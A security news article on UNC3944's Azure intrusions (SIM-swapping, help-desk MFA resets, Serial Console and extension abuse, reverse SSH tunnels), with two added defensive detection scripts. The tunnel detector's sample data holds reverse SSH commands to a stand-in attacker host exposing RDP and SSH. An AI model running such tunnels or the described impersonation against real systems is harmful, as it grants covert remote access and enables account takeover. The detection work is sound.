Published May 18, 2023
Author: Ash Khan

A cybercrime group is using phishing and SIM-swapping attacks to compromise Microsoft Azure administrator credentials and gain access to virtual machines.

The attackers then use the Azure Serial Console to install remote management software, and Azure Extensions to carry out covert surveillance.

According to Mandiant's research, the group tracked as UNC3944 has been active since at least May 2022. Its campaign aims to steal data from victims by abusing Microsoft's cloud platform.

UNC3944 was previously credited with creating the STONESTOP (loader) and POORTRY (kernel-mode driver) toolkit used to terminate security software.

To get those kernel drivers signed, the threat actors used stolen Microsoft hardware developer credentials.

SIM-swapping Azure administrators

Initial access to the Azure administrator's account is obtained with credentials stolen through SMS phishing, a common UNC3944 technique.

The attackers then call the organisation's help desk, impersonate the administrator, and persuade the desk to send an MFA reset code by SMS to the administrator's phone number.

Because the attackers have already SIM-swapped the administrator's number onto a device they control, they receive the 2FA code without the victim noticing the compromise.

Mandiant is still investigating how the group performs the SIM-swapping step. Previous cases have shown that knowing the victim's number and having a cooperative insider at the carrier is enough to port the number illicitly.

Once inside the target organisation's Azure tenant, the attackers use the administrator's privileges to gather information, modify existing Azure accounts and create new ones as needed.

Techniques for Living Off the Land

In the next phase of the attack, UNC3944 uses Azure Extensions to carry out reconnaissance and intelligence gathering, disguising its malicious activity as routine administrative work so that it blends in with normal operations.

Azure Extensions are add-on features and services that can be attached to an Azure virtual machine to extend its capabilities, automate operations and so on. Because they run inside the VM and are routinely used for legitimate purposes, they attract little suspicion.

In this case the threat actor used built-in Azure diagnostic extensions, such as "CollectGuestLogs", to collect log files from the compromised endpoint.

Breaking into VMs to steal data

UNC3944 then uses the Azure Serial Console to obtain administrative console access to VMs and run commands over the serial port.

Mandiant noted that this attack method was unique: it sidesteps many of the traditional detection methods used within Azure and gives the attacker full administrative access to the VM.

Once connected, the attackers run "whoami" to identify the currently logged-in user and gather enough context to continue the intrusion.

The appendix of Mandiant's report describes how to analyse logs for Azure Serial Console activity.
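Both Azure-native techniques described above, extension deployment and Serial Console access, leave records in the Azure Activity Log, so a single triage script can cover them. The block below is an added example and is not code from the original article or from Mandiant's report. It assumes a simplified, constructed record layout (operationName, caller, callerIpAddress, resourceId, resultType, time); the operation names and the list of watched extensions are assumptions to confirm against your own tenant's logs before alerting on them.

```python
"""Triage Azure Activity Log records for Serial Console connections and
VM extension deployments. Added example, not the article's or Mandiant's code.
Record layout is a simplified, constructed version of the Activity Log
export schema; map your export's field names onto it."""
from dataclasses import dataclass

# Activity Log operation names (assumed exact; matched case-insensitively).
SERIAL_CONSOLE_CONNECT = "microsoft.serialconsole/serialports/connect/action"
EXTENSION_WRITE = "microsoft.compute/virtualmachines/extensions/write"

# Built-in extensions that are legitimate but can pull logs or run commands
# inside a VM. Illustrative list, not exhaustive.
WATCHED_EXTENSIONS = {"collectguestlogs", "customscriptextension", "customscript"}


@dataclass(frozen=True)
class Finding:
    time: str
    caller: str
    caller_ip: str
    resource_id: str
    reason: str


def extension_name(resource_id: str) -> str:
    """Extract '<name>' from '.../virtualMachines/<vm>/extensions/<name>', or ''."""
    parts = resource_id.rstrip("/").split("/")
    for i, part in enumerate(parts[:-1]):
        if part.lower() == "extensions":
            return parts[i + 1].lower()
    return ""


def analyze(events):
    """One Finding per completed Serial Console connect or extension write.
    Activity Log emits a 'Start' record and a 'Success'/'Failed' record for
    the same operation, so only completed operations are reported."""
    findings = []
    for ev in events:
        if str(ev.get("resultType", "")).lower() not in ("success", "succeeded"):
            continue
        op = str(ev.get("operationName", "")).lower()
        rid = ev.get("resourceId", "")
        common = dict(time=ev.get("time", ""), caller=ev.get("caller", ""),
                      caller_ip=ev.get("callerIpAddress", ""), resource_id=rid)
        if op == SERIAL_CONSOLE_CONNECT:
            findings.append(Finding(**common, reason="serial-console-connect"))
        elif op == EXTENSION_WRITE:
            name = extension_name(rid) or "unknown"
            kind = "watched-extension-deploy" if name in WATCHED_EXTENSIONS else "extension-deploy"
            findings.append(Finding(**common, reason=f"{kind}:{name}"))
    return findings


def callers_with_both(findings):
    """Callers who opened a Serial Console session AND deployed an extension,
    the combination seen in this campaign and rare in routine administration."""
    by_caller = {}
    for f in findings:
        by_caller.setdefault(f.caller, set()).add(f.reason.split(":", 1)[0])
    return {c for c, kinds in by_caller.items()
            if "serial-console-connect" in kinds
            and any(k.endswith("extension-deploy") for k in kinds)}


VM = ("/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/prod-rg"
      "/providers/Microsoft.Compute/virtualMachines/app01")

# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    {"time": "2023-05-16T09:02:11Z", "operationName": "Microsoft.SerialConsole/serialPorts/connect/action",
     "caller": "jdoe@example.com", "callerIpAddress": "198.51.100.10", "resourceId": VM, "resultType": "Start"},
    {"time": "2023-05-16T09:02:12Z", "operationName": "Microsoft.SerialConsole/serialPorts/connect/action",
     "caller": "jdoe@example.com", "callerIpAddress": "198.51.100.10", "resourceId": VM, "resultType": "Success"},
    {"time": "2023-05-16T09:14:40Z", "operationName": "Microsoft.Compute/virtualMachines/extensions/write",
     "caller": "jdoe@example.com", "callerIpAddress": "198.51.100.10",
     "resourceId": VM + "/extensions/CollectGuestLogs", "resultType": "Success"},
    {"time": "2023-05-16T10:00:00Z", "operationName": "Microsoft.Compute/virtualMachines/start/action",
     "caller": "ops@example.com", "callerIpAddress": "203.0.113.5", "resourceId": VM, "resultType": "Success"},
    {"time": "2023-05-16T10:05:00Z", "operationName": "Microsoft.Compute/virtualMachines/extensions/write",
     "caller": "ops@example.com", "callerIpAddress": "203.0.113.5",
     "resourceId": VM + "/extensions/MicrosoftMonitoringAgent", "resultType": "Failed"},
]

if __name__ == "__main__":
    results = analyze(SAMPLE_EVENTS)
    for f in results:
        print(f"{f.time} {f.caller} from {f.caller_ip}: {f.reason} on {f.resource_id}")
    print("callers combining both techniques:", callers_with_both(results))
```

On the constructed sample the script reports two findings for jdoe@example.com (the Serial Console connect and the CollectGuestLogs deployment) and flags that caller as combining both techniques; the failed extension write and the VM start are ignored. In production, feed it the Activity Log export or the AzureActivity table and compare callers and source IPs against your change records and the administrators' usual locations.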


According to Mandiant's research, the attackers then use PowerShell to entrench their persistence on the VM by installing various commercially available remote administration tools. Because these tools carry legitimate signatures, they provide covert remote access without triggering endpoint detection alerts.

UNC3944's next move is to establish a reverse SSH tunnel to its command-and-control (C2) server, giving it persistent, covert access over an encrypted channel while sidestepping network restrictions and security controls.

The attacker configures the reverse tunnel with remote port forwarding, which lets them log in directly to the Azure VM: any connection arriving at port 12345 on the remote (attacker-controlled) machine, for example, is forwarded to port 3389 on the VM's localhost.

Finally, the attackers use the reverse tunnel to log in to the compromised Azure VM with the credentials of a stolen user account, then escalate their privileges within the environment while exfiltrating data.
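The tunnel described in the preceding steps is an ordinary ssh remote forward (`-R 12345:localhost:3389`), so one practical hunt is to parse the command lines of running ssh processes on the VM and report which local service each reverse forward exposes. The block below is an added example, not code from the original article or from Mandiant's report. The process snapshot is constructed (the kind of output `ps -eo pid,args` or `Get-CimInstance Win32_Process` would give); the attacker host 203.0.113.7 and the use of port 443 for the SSH session are assumptions for illustration. It goes slightly beyond the article's one form by also recognising bundled flags (`-fNR`), the `-R12345:...` form and `-o RemoteForward=...`, all of which a naive grep for `-R` would miss.

```python
"""Find reverse SSH tunnels by inspecting process command lines and report
which local service each one exposes. Added example, not the article's or
Mandiant's code. Input is a constructed (pid, command line) snapshot."""
import re
import shlex
from dataclasses import dataclass

# Local services an attacker would typically publish through a reverse tunnel.
SENSITIVE_LOCAL_PORTS = {3389: "RDP", 22: "SSH", 5985: "WinRM", 5986: "WinRM-TLS"}

# ssh(1) single-letter options that take no argument; they may be bundled in
# front of -R (e.g. "-fNR spec"). Assumed complete enough for triage.
SSH_NOARG_FLAGS = set("46AaCfGgKkMNnqsTtVvXxYy")


@dataclass(frozen=True)
class RemoteForward:
    bind_port: int     # port the SSH server (attacker side) listens on
    target_host: str   # host the SSH client (victim VM) forwards to
    target_port: int


def parse_forward_spec(spec: str):
    """Parse '[bind_address:]port:host:hostport' into a RemoteForward, or None."""
    parts = spec.split(":")
    if len(parts) == 4:
        parts = parts[1:]            # drop an explicit bind address
    if len(parts) != 3:
        return None
    port, host, hostport = parts
    try:
        return RemoteForward(int(port), host, int(hostport))
    except ValueError:
        return None


def _remote_specs(argv):
    """Yield every -R / RemoteForward specification in an ssh argv."""
    i = 0
    while i < len(argv):
        arg = argv[i]
        if arg == "-o" and i + 1 < len(argv):
            # '-o "RemoteForward=12345 localhost:3389"' evades a naive grep for -R
            key, _, value = argv[i + 1].replace("=", " ", 1).partition(" ")
            if key.lower() == "remoteforward":
                yield ":".join(value.split())
            i += 2
        elif arg.startswith("-") and not arg.startswith("--") and "R" in arg[1:]:
            bundled, rest = arg[1:].split("R", 1)
            if set(bundled) <= SSH_NOARG_FLAGS:      # "-R", "-NR", "-fNR" ...
                if rest:                              # "-R12345:localhost:3389"
                    yield rest
                    i += 1
                    continue
                if i + 1 < len(argv):                 # "-R 12345:localhost:3389"
                    yield argv[i + 1]
                    i += 2
                    continue
            i += 1                                    # e.g. "-lRuser": R is a username
        else:
            i += 1


def reverse_forwards(cmdline: str):
    """RemoteForward entries of an ssh command line ([] if it is not ssh)."""
    try:
        # non-POSIX mode keeps Windows backslash paths intact; strip quotes ourselves
        argv = [t.strip("\"'") for t in shlex.split(cmdline, posix=False)]
    except ValueError:
        return []
    if not argv or re.split(r"[\\/]", argv[0])[-1].lower() not in ("ssh", "ssh.exe"):
        return []
    return [rf for rf in map(parse_forward_spec, _remote_specs(argv)) if rf]


def suspicious_tunnels(processes):
    """(pid, RemoteForward, service) for every tunnel exposing a sensitive local port."""
    hits = []
    for pid, cmdline in processes:
        for rf in reverse_forwards(cmdline):
            if rf.target_host in ("localhost", "127.0.0.1", "::1") and rf.target_port in SENSITIVE_LOCAL_PORTS:
                hits.append((pid, rf, SENSITIVE_LOCAL_PORTS[rf.target_port]))
    return hits


# Constructed process snapshot (not real telemetry). PID 4120 mirrors the
# article's example: attacker-side port 12345 forwarded to the VM's RDP port.
SAMPLE_PROCESSES = [
    (4120, r'C:\Windows\System32\OpenSSH\ssh.exe -N -R 12345:localhost:3389 svc@203.0.113.7 -p 443'),
    (4177, 'ssh -fNR 2222:127.0.0.1:22 ops@203.0.113.7'),
    (4201, 'ssh -o "RemoteForward=12345 localhost:3389" svc@203.0.113.7'),
    (4300, 'ssh -L 8080:intranet:80 user@jumphost'),   # local forward, not a reverse tunnel
    (4400, 'ssh -lRuser host'),                        # "-l Ruser": not a remote forward
]

if __name__ == "__main__":
    for pid, rf, service in suspicious_tunnels(SAMPLE_PROCESSES):
        print(f"pid {pid}: remote :{rf.bind_port} -> {rf.target_host}:{rf.target_port} ({service})")
```

On the sample snapshot this flags PIDs 4120, 4177 and 4201 (RDP, SSH and RDP respectively) and ignores the local forward and the `-lRuser` false positive. Command-line inspection only sees tunnels opened with the stock ssh client; a tool that reads its forwards from a config file or embeds its own SSH library needs a network-side check, such as long-lived outbound SSH sessions from a VM that should never initiate them.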


To sum up

The attack chain documented by Mandiant shows UNC3944's strong familiarity with the Azure ecosystem and how its built-in features can be turned against it to avoid detection.

Combined with the high-level social engineering skills that make the SIM swapping possible, that knowledge amplifies the risk considerably.

Organisations that rely on weak controls such as SMS-based MFA, often because of a limited understanding of cloud technology, leave themselves open to these sophisticated attacks.